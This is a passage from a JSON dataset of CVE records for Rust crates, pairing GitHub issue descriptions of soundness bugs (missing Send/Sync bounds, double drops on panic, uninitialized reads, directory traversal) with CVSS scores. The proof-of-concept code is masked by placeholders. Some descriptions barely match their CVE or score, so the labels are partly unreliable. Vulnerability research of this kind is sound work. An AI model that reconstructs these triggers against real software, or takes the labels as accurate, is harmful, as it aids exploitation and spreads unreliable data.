        "Issue_Url_old": "https://github.com/actix/actix-net/issues/91",
        "Issue_Url_new": "https://github.com/actix/actix-net/issues/91",
        "Repo_new": "actix/actix-net",
        "Issue_Created_At": "2020-01-30T14:27:19Z",
        "description": "UB due to unsafe pinning in actix codec. The following code segfaults, due to incorrect pinning in Framed . ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25908",
        "Issue_Url_old": "https://github.com/cogciprocate/ocl/issues/194",
        "Issue_Url_new": "https://github.com/cogciprocate/ocl/issues/194",
        "Repo_new": "cogciprocate/ocl",
        "Issue_Created_At": "2021-01-04T13:06:37Z",
        "description": "double drop may happen upon panic in APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description We found NUMBERTAG cases (below) where a double drop of an objects can happen if a panic occurs within the user provided APITAG implementation. URLTAG URLTAG Proof of Concept The example program below exhibits a double drop. ERRORTAG Suggested Fix In this case, using APITAG can help guard against the potential panic within APITAG . I'll submit a PR with the suggested fix right away. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35894",
        "Issue_Url_old": "https://github.com/petertodd/rust-obstack/issues/4",
        "Issue_Url_new": "https://github.com/petertodd/rust-obstack/issues/4",
        "Repo_new": "petertodd/rust-obstack",
        "Issue_Created_At": "2020-09-03T06:27:05Z",
        "description": "Obstack generates unaligned references. URLTAG Description Obstack generates unaligned references for types that require a large alignment. Demonstration Crate: obstack Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG Cargo flags: release ERRORTAG Output: CODETAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36204",
        "Issue_Url_old": "https://github.com/bodil/im-rs/issues/157",
        "Issue_Url_new": "https://github.com/bodil/im-rs/issues/157",
        "Repo_new": "bodil/im-rs",
        "Issue_Created_At": "2020-11-09T07:14:37Z",
        "description": "APITAG lacks bounds on its Send and Sync traits. It looks like the version of Focus for RRB tree backed vectors, APITAG lacks bounds for Sync and Send : URLTAG I realize APITAG is an implementation detail and not really meant to be used by end users of the library but I think this opens up the possibility of causing data races through safe Rust code like this: ERRORTAG which outputs APITAG APITAG found by the Rust group at APITAG gatech)",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2021-26308",
        "Issue_Url_old": "https://github.com/blackbeam/rust-marc/issues/7",
        "Issue_Url_new": "https://github.com/blackbeam/rust-marc/issues/7",
        "Repo_new": "blackbeam/rust-marc",
        "Issue_Created_At": "2021-01-27T04:02:42Z",
        "description": "Record::read : Custom Read on uninitialized buffer may cause UB. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG FILETAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Another question I have regarding APITAG : Right before APITAG , why APITAG instead of APITAG ? At the momment it seems unsound to me :( How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29932",
        "Issue_Url_old": "https://github.com/zeta12ti/parse_duration/issues/21",
        "Issue_Url_new": "https://github.com/zeta12ti/parse_duration/issues/21",
        "Repo_new": "zeta12ti/parse_duration",
        "Issue_Created_At": "2021-03-18T14:59:54Z",
        "description": "Denial of service through malicious payloads. Hey, As reported in URLTAG there are payloads that makes the APITAG to cause denial of service through big integer pow calculations. I am not sure if the suggested solution is the best one, maybe there should be a way to specify the exponent limit or whether we accept an exponent at all in the duration string. Since the repo didn't have any commit for a ~year, MENTIONTAG are you going to fix it?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36467",
        "Issue_Url_old": "https://github.com/playXE/cgc/issues/5",
        "Issue_Url_new": "https://github.com/playxe/cgc/issues/5",
        "Repo_new": "playxe/cgc",
        "Issue_Created_At": "2020-12-10T08:24:12Z",
        "description": "Soundness issues with Ptr. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that some soundness issues in the Ptr class NUMBERTAG Ptr implements the Send and Sync traits for all types: URLTAG This allows you to send types that aren't safe to use across threads like Rc and Cell . We'd recommend only implementing this when the APITAG and APITAG NUMBERTAG Ptr violates aliasing rules by having APITAG take a reference and return a mutable reference. URLTAG This allows you to create multiple mutable references to the same object which is undefined behavior in Rust NUMBERTAG APITAG writes to the raw pointer underneath: URLTAG This can lead to data races, using an atomic pointer would be better if you want to support multiple threads. Here's a proof of concept for the two of the issues above: ERRORTAG This outputs: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-29940",
        "Issue_Url_old": "https://github.com/gretchenfrage/through/issues/1",
        "Issue_Url_new": "https://github.com/gretchenfrage/through/issues/1",
        "Repo_new": "gretchenfrage/through",
        "Issue_Created_At": "2021-02-18T16:48:01Z",
        "description": "double free of T upon panic in two functions. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Public functions APITAG and APITAG are not panic safe. Both take a user provided closure as a parameter, and a double drop of T will happen if the user provided closure panics. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of through . APITAG Detail APITAG APITAG ERRORTAG Output: ERRORTAG Tested Environment Crate: through Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36461",
        "Issue_Url_old": "https://github.com/pipedown/noise/issues/72",
        "Issue_Url_new": "https://github.com/pipedown/noise/issues/72",
        "Repo_new": "pipedown/noise",
        "Issue_Created_At": "2020-12-10T06:28:35Z",
        "description": "Soundness issue in APITAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG implements Send and Sync for all types: URLTAG However, this should probably have tighter bounds on its Send and Sync traits, otherwise its possible to create data races from safe rust code by using non Sync types like Cell across threads or sending non Send types across like Rc . Here's a little proof of concept using Rc . ERRORTAG This outputs: APITAG It seems like this class also potentially allows for aliasing violations, in this case maybe it would be better to mark the methods as unsafe and maybe not expose the class outside the crate?",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35881",
        "Issue_Url_old": "https://github.com/reem/rust-traitobject/issues/7",
        "Issue_Url_new": "https://github.com/reem/rust-traitobject/issues/7",
        "Repo_new": "reem/rust-traitobject",
        "Issue_Created_At": "2020-06-01T11:44:40Z",
        "description": "Please, release a new version. The implementation of the data and APITAG functions is highly unsafe: URLTAG This assumes that the first element is a fat pointer is the data pointer. This is currently true, but it can change in a newer rust version, which would make this crate a potential security hole. Commit URLTAG fixed this, but it has not been released into a new version. Please, publish a new version NUMBERTAG that includes this commit (and possibly yank the previous versions).",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-30455",
        "Issue_Url_old": "https://github.com/andrewhickman/id-map/issues/3",
        "Issue_Url_new": "https://github.com/andrewhickman/id-map/issues/3",
        "Repo_new": "andrewhickman/id-map",
        "Issue_Created_At": "2021-02-26T05:26:13Z",
        "description": "Multiple panic safety issues. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a few FILETAG issues in this library. clone_from double frees if T::clone panics URLTAG The current values in the map are dropped and the ids are updated up front. This means that if ERRORTAG panics, it can cause the previously dropped values to drop again. get_or_insert double frees if insertion function f panics URLTAG Since this reserves space for the value before calling APITAG , if f panics here, it can drop an already freed value. remove_set double frees if drop panics URLTAG This code goes over to the ids to remove and calls APITAG on them. However if the drop function for the type panics, the element gets dropped again when the APITAG is dropped. Code to recrate these problems is here: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-25005",
        "Issue_Url_old": "https://github.com/RustCrypto/stream-ciphers/issues/64",
        "Issue_Url_new": "https://github.com/rustcrypto/stream-ciphers/issues/64",
        "Repo_new": "rustcrypto/stream-ciphers",
        "Issue_Created_At": "2019-10-22T11:44:30Z",
        "description": "Best place to discuss possible security issues?. Hi! What's the best place to discuss possible security issues regarding the code in this repo?",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36440",
        "Issue_Url_old": "https://github.com/mvertescher/libsbc-rs/issues/4",
        "Issue_Url_new": "https://github.com/mvertescher/libsbc-rs/issues/4",
        "Repo_new": "mvertescher/libsbc-rs",
        "Issue_Created_At": "2020-11-10T07:57:54Z",
        "description": "Minor soundness issue with Decoder's Send trait. The Send trait for Decoder should probably be APITAG here: URLTAG otherwise it's possible to send Read instances across threads that might not support it. For example APITAG is a Read but is not Send . However, wrapping it in a Decoder allows it to be sent across threads: CODETAG fails with an assertion error because Send is implemented. APITAG found by APITAG gatech's Rust group)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-45706",
        "Issue_Url_old": "https://github.com/iqlusioninc/crates/issues/876",
        "Issue_Url_new": "https://github.com/iqlusioninc/crates/issues/876",
        "Repo_new": "iqlusioninc/crates",
        "Issue_Created_At": "2021-09-24T15:06:20Z",
        "description": "APITAG no op in zeroize_derive NUMBERTAG for enum s. I discovered a bug where APITAG doesn't generate a Drop implementation when used on enum s. It seems to me that it was accidentally fixed by NUMBERTAG in zeroize_derive version NUMBERTAG The bug still exists in version NUMBERTAG If I'm not missing something and this bug is real, version NUMBERTAG should probably be yanked and a report filed at APITAG Advisory Database. APITAG : APITAG APITAG : CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35915",
        "Issue_Url_old": "https://github.com/Matthias247/futures-intrusive/issues/53",
        "Issue_Url_new": "https://github.com/matthias247/futures-intrusive/issues/53",
        "Repo_new": "matthias247/futures-intrusive",
        "Issue_Created_At": "2020-10-31T19:17:32Z",
        "description": "APITAG should be marked APITAG I think the APITAG object should me marked explicitly as APITAG , it looks like it was automatically given the Sync trait because it only consists of a APITAG reference which itself is Sync . However, the lock guard object itself shouldn't be usable across threads because it assumes it has the lock acquired. APITAG issue was found by APITAG Here's a demonstration of how this can cause Cell , a non Sync but Sendable type to be used across threads to create a data race: ERRORTAG Output: CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-30454",
        "Issue_Url_old": "https://github.com/SolraBizna/outer_cgi/issues/1",
        "Issue_Url_new": "https://github.com/solrabizna/outer_cgi/issues/1",
        "Repo_new": "solrabizna/outer_cgi",
        "Issue_Created_At": "2021-01-31T15:55:30Z",
        "description": "Read on uninitialized buffer may cause UB. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation NUMBERTAG such occurrences within the same function). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15549",
        "Issue_Url_old": "https://github.com/KizzyCode/asn1_der/issues/1",
        "Issue_Url_new": "https://github.com/kizzycode/asn1_der-rust/issues/1",
        "Repo_new": "kizzycode/asn1_der-rust",
        "Issue_Created_At": "2019-06-13T01:40:49Z",
        "description": "Unchecked length can cause memory allocation error.. When de serializing bytes, an arbitrary length of the value can be specified. When building APITAG here: URLTAG This can lead to memory crashes for arbitrary large length values. Perhaps an upper bound is required to prevent crashing applications when de serializing arbitrary byte arrays. This can be reproduced in the following example: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36451",
        "Issue_Url_old": "https://github.com/Xudong-Huang/rcu_cell/issues/3",
        "Issue_Url_new": "https://github.com/xudong-huang/rcu_cell/issues/3",
        "Repo_new": "xudong-huang/rcu_cell",
        "Issue_Created_At": "2020-11-15T02:40:08Z",
        "description": "APITAG bound needed on T for APITAG impl of APITAG Hello! :crab:, while scanning APITAG we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue There is no Send bound on T of Send impl of APITAG There is no Sync bound on T of Sync impl of APITAG ERRORTAG By exploiting this issue, it's possible to send non Send items to other threads, or share a non Sync item concurrently across multiple threads. Proof of Concept You need to run the below program in Debug mode in order to observe undefined behavior. In the program below, multiple threads clone & drop Rc (which is neither Send nor Sync). Since Rc 's internal APITAG is updated by multiple threads without synchronization, the program will terminate in either one of the following states. APITAG NUMBERTAG program panics at the assertion check at the end (indicates memory leak in this case) APITAG NUMBERTAG Rc is dropped while references to it are still alive. When run on Ubuntu NUMBERTAG program crashes with error: APITAG APITAG NUMBERTAG Not impossible, but highly unlikely ERRORTAG How to fix Adding trait bounds to APITAG impls of APITAG as below would be one way to fix the issue. ERRORTAG Thank you for reviewing this issue! :crab:",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36214",
        "Issue_Url_old": "https://github.com/abbychau/multiqueue2/issues/10",
        "Issue_Url_new": "https://github.com/abbychau/multiqueue2/issues/10",
        "Repo_new": "abbychau/multiqueue2",
        "Issue_Created_At": "2020-12-19T13:16:47Z",
        "description": "Queues allow non Send types to be sent to other threads, allowing data races. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue T is not bound to Send in the following Send impls, and thus all queue APIs provided by the crate (except for APITAG APITAG ) can send non Send types to other threads. This can allow data race bugs in safe Rust programs. ERRORTAG Proof of Concept I wrote two example programs that can trigger data race bugs while using this crate. Both programs were tested on APITAG , using APITAG in Debug mode. APITAG Program NUMBERTAG APITAG to expand) APITAG This creates a data race to a Cell , causing memory corruption & segmentation fault. APITAG ERRORTAG APITAG APITAG APITAG Program NUMBERTAG APITAG to expand) APITAG This creates a data race to a single Rc , causing either a segmentation fault (illegal instruction) or a memory leak. APITAG ERRORTAG APITAG APITAG Solution One solution for the issue is to add APITAG bounds to the following types' Send impls as below. After making the following changes, the compiler can revoke programs that use the queues to send non Send types to other threads. Please let me know about your opinion on the suggested changes :) ERRORTAG Thank you for reviewing this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-26954",
        "Issue_Url_old": "https://github.com/qwertz19281/rust_utils/issues/3",
        "Issue_Url_new": "https://github.com/qwertz19281/rust_utils/issues/3",
        "Repo_new": "qwertz19281/rust_utils",
        "Issue_Created_At": "2021-02-03T16:01:21Z",
        "description": "Panic safety issue leading to double drop in insert_slice_clone. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , it pushes elements over for insertion using ptr::copy here: URLTAG This can duplicate items in the Vec , after which it calls APITAG , which can potentially panic. This means that during this panic the copied elements can be dropped twice. Here's a quick example of this issue: ERRORTAG This outputs: CODETAG As you can see the first element is being dropped twice. We'd recommend wrapping the vector in APITAG while you're operating on it to prevent this.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36471",
        "Issue_Url_old": "https://github.com/Xudong-Huang/generator-rs/issues/27",
        "Issue_Url_new": "https://github.com/xudong-huang/generator-rs/issues/27",
        "Repo_new": "xudong-huang/generator-rs",
        "Issue_Created_At": "2020-11-16T18:39:16Z",
        "description": "Generator's Send trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Generator implements Send as long as the closure has a static lifetime. However, this should also probably be bounded by APITAG , otherwise it's possible to smuggle across non Send types across thread boundaries. Here's an example of a data race in safe Rust code through a Generator. ERRORTAG Output: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35889",
        "Issue_Url_old": "https://github.com/shawnscode/crayon/issues/87",
        "Issue_Url_new": "https://github.com/shawnscode/crayon/issues/87",
        "Repo_new": "shawnscode/crayon",
        "Issue_Created_At": "2020-08-31T21:14:54Z",
        "description": "Misbehaving APITAG implementation can lead to memory safety violation. URLTAG URLTAG URLTAG Description Unsafe code in APITAG has time of check to time of use (TOCTOU) bug that can eventually lead to a memory safety violation. APITAG and APITAG implicitly assumes that APITAG trait methods are pure, i.e., they always return the same value. However, this assumption is unsound since APITAG is a safe, public trait that allows a custom implementation. Demonstration Crate: crayon Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG SIGSEGV)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-26952",
        "Issue_Url_old": "https://github.com/andrewhickman/ms3d/issues/1",
        "Issue_Url_new": "https://github.com/andrewhickman/ms3d/issues/1",
        "Repo_new": "andrewhickman/ms3d",
        "Issue_Created_At": "2021-01-27T03:40:34Z",
        "description": "APITAG : user provided Read on uninitialized buffer may cause UB. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). This method is invokable from APITAG method. FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-45712",
        "Issue_Url_old": "https://github.com/pyros2097/rust-embed/issues/159",
        "Issue_Url_new": "https://github.com/pyrossh/rust-embed/issues/159",
        "Repo_new": "pyrossh/rust-embed",
        "Issue_Created_At": "2021-11-27T19:16:22Z",
        "description": "Directory traversal attack allowed when running in debug mode. ERRORTAG This code will (assuming you have the correct number of APITAG s), print out the contents of your APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35886",
        "Issue_Url_old": "https://github.com/sjep/array/issues/1",
        "Issue_Url_new": "https://github.com/sjep/array/issues/1",
        "Repo_new": "sjep/array",
        "Issue_Created_At": "2020-08-25T23:05:52Z",
        "description": "Multiple security issues including data race, buffer overflow, and uninitialized memory drop. Description arr crate contains multiple security issues. Specifically NUMBERTAG It incorrectly implements APITAG bounds, which allows to smuggle non APITAG types across the thread boundary NUMBERTAG Index and APITAG implementation does not check the array bound NUMBERTAG APITAG drops uninitialized memory. Demonstration Crate: arr Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly NUMBERTAG d NUMBERTAG c5a NUMBERTAG Cargo flags: release ERRORTAG Output: ERRORTAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-36206",
        "Issue_Url_old": "https://github.com/a1ien/rusb/issues/44",
        "Issue_Url_new": "https://github.com/a1ien/rusb/issues/44",
        "Repo_new": "a1ien/rusb",
        "Issue_Created_At": "2020-12-19T01:51:50Z",
        "description": "Unsound APITAG bound for Device and APITAG Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG Device and APITAG implement Send and Sync trait for all T types that implement APITAG . APITAG trait has neither Send nor Sync bound and can be implemented from the user side. This permits writing a custom non thread safe APITAG implementation in safe Rust code, which can cause a data race when used with Device or APITAG . If APITAG is not expected to be implemented by users, making APITAG a sealed trait URLTAG can solve this problem. Otherwise, a proper bound should be added to APITAG implementations of Device and APITAG ( APITAG ) or to the definition of APITAG ( APITAG ).",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.0,
        "impactScore": 5.9,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2020-36215",
        "Issue_Url_old": "https://github.com/AdrienChampion/hashconsing/issues/1",
        "Issue_Url_new": "https://github.com/adrienchampion/hashconsing/issues/1",
        "Repo_new": "adrienchampion/hashconsing",
        "Issue_Created_At": "2020-11-10T19:27:49Z",
        "description": "APITAG Send and Sync traits should be bounded on the contained type. Currently, APITAG implements the Send and Sync traits unconditionally: URLTAG This is a possible soundness issue because it allows types T that aren't necessarily thread safe to be used across threads as long as they are wrapped in an APITAG . Sort of a contrived example but the following demonstrates a data race that segfaults safe rust using this: APITAG APITAG to expand example APITAG ERRORTAG APITAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36462",
        "Issue_Url_old": "https://github.com/Chopinsky/byte_buffer/issues/2",
        "Issue_Url_new": "https://github.com/chopinsky/byte_buffer/issues/2",
        "Repo_new": "chopinsky/byte_buffer",
        "Issue_Created_At": "2020-11-29T22:11:46Z",
        "description": "Send bound needed on T (for Send impl of APITAG ). Hello :crab: , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue Currently Send is implemented for APITAG even when T is not bound by Send . ERRORTAG This makes it possible to use APITAG to send a non Send object to other threads. Proof of Concept Below is an example program that exhibits undefined behavior using the syncpool crate. There is a data race on the internal reference count of Rc , and the program either crashes at runtime (e.g. on Ubuntu: APITAG ) , or panics at the end of the program (indicating a memory leak) . Such behavior can be observed when the program is compiled in Debug mode. ERRORTAG The example is a bit contrived, but it triggers undefined behavior in safe Rust code. How to fix the issue The solution is to add a Send bound on T in the Send impl for APITAG as below. I tested the above example using the modified version of the crate, and the compiler was able to successfully revoke the program. ERRORTAG Thank you for checking out this issue :crab:",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-36465",
        "Issue_Url_old": "https://github.com/fizyk20/generic-array/issues/98",
        "Issue_Url_new": "https://github.com/fizyk20/generic-array/issues/98",
        "Repo_new": "fizyk20/generic-array",
        "Issue_Created_At": "2020-04-09T21:34:52Z",
        "description": "APITAG unsoundness. The APITAG macro silently and unsoundly extends arbitrary lifetimes to APITAG ( playground URLTAG : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38187",
        "Issue_Url_old": "https://github.com/chris-morgan/anymap/issues/37",
        "Issue_Url_new": "https://github.com/chris-morgan/anymap/issues/37",
        "Repo_new": "chris-morgan/anymap",
        "Issue_Created_At": "2019-11-12T22:00:36Z",
        "description": "When is the next crates.io release?. I see a number of commits here, but on crates.io the library is APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-26951",
        "Issue_Url_old": "https://github.com/tafia/calamine/issues/199",
        "Issue_Url_new": "https://github.com/tafia/calamine/issues/199",
        "Repo_new": "tafia/calamine",
